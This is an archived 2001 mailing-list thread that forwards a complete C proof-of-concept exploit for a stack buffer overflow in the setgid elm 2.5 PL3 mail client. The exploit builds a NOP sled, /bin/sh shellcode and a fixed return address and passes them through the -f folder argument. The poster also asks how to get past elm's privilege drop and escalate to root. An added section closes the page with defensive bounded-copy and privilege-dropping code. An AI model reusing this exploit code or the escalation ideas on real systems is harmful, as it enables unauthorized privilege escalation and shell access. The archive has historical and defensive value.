Vulnerability Development mailing list archives

FW: elm 2.5 PL3 exploit


From: "Rasta C. Shell" <rasta () RSHELL ORG>
Date: Wed, 14 Feb 2001 15:48:01 +0200

You might have seen this on bugtraq. If we are still on the subject of elm and such,
I have tried my own exploit on the elm setgid binary. I was able to
exploit it but, due to a SETGID(getgroup) in syscall.c, was not able
to gain root gid (my shellcode had a setregid() call and I also tried a setegid
call (setregid(-1,gid))).
Is there a way to overcome that?

Furthermore, how can good (uid=0) come from a gid=0, when the system file
permissions are reasonably safe, i.e. /etc/passwd is mode 644, ~root is 755, etc.?


-rasta


----- Forwarded message from kiss <NIKEBOY () RETEMAIL ES> -----

From: kiss <NIKEBOY () RETEMAIL ES>
Subject:      elm 2.5 PL3 exploit
To: BUGTRAQ () SECURITYFOCUS COM

This is just a proof of concept; I haven't included the setgid call in the
shellcode:

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdio.h>      /* printf() */
#include <stdlib.h>     /* putenv(), system() */
#include <string.h>     /* strcpy(), strcat(), strlen() */

#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64  /* 32-bit x86 Linux stack address, offset 0 */

unsigned long dame_sp() {
        __asm__("movl %esp,%eax");
}

int main() {

        static char shellcode[]=
/* "\x31\xc0"   */              /* xorl %eax,%eax        */
/* "\x31\xdb"   */              /* xorl %ebx,%ebx        */
/* "\xb0\x17"   */              /* movb $0x17,%al        */
/* "\xcd\x80"   */              /* int $0x80             */
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

        int i=0;
        int cont=0;
        char buffer[LEN+5];     /* +4 for the last RET write, +1 for the NUL */
        char kid[6+LEN+4];

        printf("-------------------------------------\n");
        printf("elm buffer overflow exploit by _kiss_\n");
        printf("-------------------------------------\n");

        /* fill the whole buffer with the return address (4-byte words) */
        for (i=0;i<=LEN;i+=4)
                *(long *) &buffer[i] = RET;

        /* NOP sled in front of the shellcode */
        for (i=0;i<LEN-strlen(shellcode)-100;i++)
                buffer[i]=NOP;

        /* shellcode, followed by the remaining RET copies */
        for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
                buffer[i]=shellcode[cont++];

        buffer[LEN+4]='\0';     /* strcat() below needs a terminated string */

        /* pass the payload through the environment as the -f folder argument */
        strcpy(kid,"KID=");
        strcat(kid,buffer);
        putenv(kid);
        system("/usr/local/bin/elm -f $KID");
        return 0;
}


Solution is simple: upgrade ;)

                                                        _kiss_

----- End forwarded message -----

--
http://www.rshell.org
Join #shellcode on EFnet.
rasta () rshell org
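Two defensive points in the thread deserve a concrete illustration: the PoC works because an attacker-controlled string (the -f folder argument, filled from $KID) is copied into a fixed-size stack buffer without a length check, and its impact was limited because elm drops its setgid group before doing anything with that input. The following C program is an added example written for this archive page; it is neither elm's code nor the posters' code. FOLDER_LEN, copy_folder_name() and drop_group_privileges() are assumed names, and the buffer size is a placeholder rather than elm's actual value. It uses the Linux/glibc setresgid()/getresgid() calls (hence _GNU_SOURCE) so that real, effective and saved gid are all replaced and the drop is verified rather than assumed.

```c
#define _GNU_SOURCE             /* setresgid(), getresgid(), strnlen() on glibc */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define FOLDER_LEN 256          /* assumed fixed buffer size; not elm's real value */

/* Bounded copy of an attacker-controllable string (the -f folder name) into a
 * fixed buffer. Returns 0 on success, -1 if the input would not fit; dst is
 * left untouched on failure so the caller cannot use a half-copied name. */
int copy_folder_name(char *dst, size_t dstlen, const char *src)
{
    size_t n;

    if (dstlen == 0)
        return -1;
    n = strnlen(src, dstlen);   /* never scans further than the buffer size */
    if (n >= dstlen)
        return -1;              /* no room for the data plus the terminator */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Irrevocably drop the group privilege of a setgid binary: real, effective and
 * saved gid all become the invoking user's real gid, so later code (including
 * anything reached through a bug) cannot switch back. The result is verified
 * with getresgid(). Returns 0 only if all three ids match the real gid. */
int drop_group_privileges(void)
{
    gid_t real = getgid();
    gid_t r, e, s;

    if (setresgid(real, real, real) != 0)
        return -1;
    if (getresgid(&r, &e, &s) != 0)
        return -1;
    return (r == real && e == real && s == real) ? 0 : -1;
}

int main(int argc, char **argv)
{
    char folder[FOLDER_LEN];
    const char *requested = (argc > 1) ? argv[1] : "inbox";

    /* drop privilege before touching any user-supplied input */
    if (drop_group_privileges() != 0) {
        fprintf(stderr, "cannot drop group privileges\n");
        return 1;
    }
    if (copy_folder_name(folder, sizeof folder, requested) != 0) {
        fprintf(stderr, "folder name too long (max %d bytes)\n", FOLDER_LEN - 1);
        return 1;
    }
    printf("gid=%u egid=%u folder=%s\n",
           (unsigned)getgid(), (unsigned)getegid(), folder);
    return 0;
}
```

Run it unprivileged (`./a.out inbox`) and the drop is a no-op that still verifies cleanly; installed setgid, the verification is what matters: a setgid() call that only changes the effective id leaves the saved id in place, which is exactly what a setregid(-1, gid) in injected code would try to use, so replacing all three ids and checking the result is the pattern to copy. Supplementary groups (setgroups()) need CAP_SETGID and are left to the caller here.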

